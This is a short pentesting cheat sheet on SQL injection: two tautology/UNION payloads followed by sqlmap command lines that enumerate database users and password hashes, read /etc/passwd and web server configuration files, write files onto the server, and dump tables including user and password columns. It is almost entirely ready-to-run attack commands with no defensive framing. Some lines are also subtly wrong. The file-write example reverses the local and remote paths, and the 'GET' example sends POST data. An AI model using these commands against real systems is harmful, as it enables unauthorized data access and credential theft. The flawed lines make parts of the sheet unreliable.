# Simple SQL Injection Payloads for Testing ```http test' OR 1=1 -- test' UNION SELECT NULL,NULL-- ``` --- # Enumeration with `sqlmap` ## HTTP GET Requests ```bash sqlmap -u '(http://www.example.com/' --data 'uid=1&name=test' --batch ``` - Once we know which parameter is injectable, we can specify the injection point for efficiency ```bash sqlmap -u 'http://www.example.com/' --data 'uid=1*&name=test' --batch ``` ## HTTP POST Requests - Copy POST request to file using `burp` or Mozilla dev tools ```bash sqlmap -r request.txt --batch ``` ## Enumerate current db and user info ```bash sqlmap -r request.txt --dbms=mysql --technique=BEU --risk=3 --level=5 --privilege --current-db --is-dba --banner --batch sqlmap -r request.txt --dbms=mysql --technique=BEU --risk=3 --level=5 --users --passwords ``` ## Attempt to read critical files ```bash sqlmap -r request.txt --dbms=mysql --technique=BEU --risk=3 --level=5 --file-read=/etc/passwd --batch #output may be in HEX sqlmap -r request.txt --dbms=mysql --technique=BEU --risk=3 --level=5 --file-read=/etc/apache2/apache2.conf --batch #Debian installs sqlmap -r request.txt --dbms=mysql --technique=BEU --risk=3 --level=5 --file-read=/etc/nginx/nginx.conf --batch sqlmap -r request.txt --dbms=mysql --technique=BEU --risk=3 --level=5 --file-read=/etc/nginx/sites-enabled/default --batch ``` ## Attempt to write files ```bash sqlmap -r request.txt --dbms=mysql --technique=BEU --risk=3 --level=5 --file-write=/remote/path --file-dest=/local/path --batch ``` ## Enumerate dbs & schema ```bash sqlmap -r request.txt --dbms=mysql --technique=BEU --risk=3 --level=5  --dbs --schema  --batch ``` ## Enumerate tables & columns ```bash sqlmap -r request.txt --dbms=mysql --technique=BEU --risk=3 --level=5 -D TARGET-DB --tables --batch sqlmap -r request.txt --dbms=mysql --technique=BEU --risk=3 --level=5 -D TARGET-DB -T TARGET_TABLE --columns --batch ``` ## Dump tables ```bash sqlmap -r request.txt --dbms=mysql --technique=BEU --risk=3 --level=5 -D TARGET-DB -T TARGET_TABLE --dump --batch sqlmap -r request.txt --dbms=mysql --technique=BEU --risk=3 --level=5 -D TARGET-DB -T TARGET_TABLE -C user,password --dump --batch ```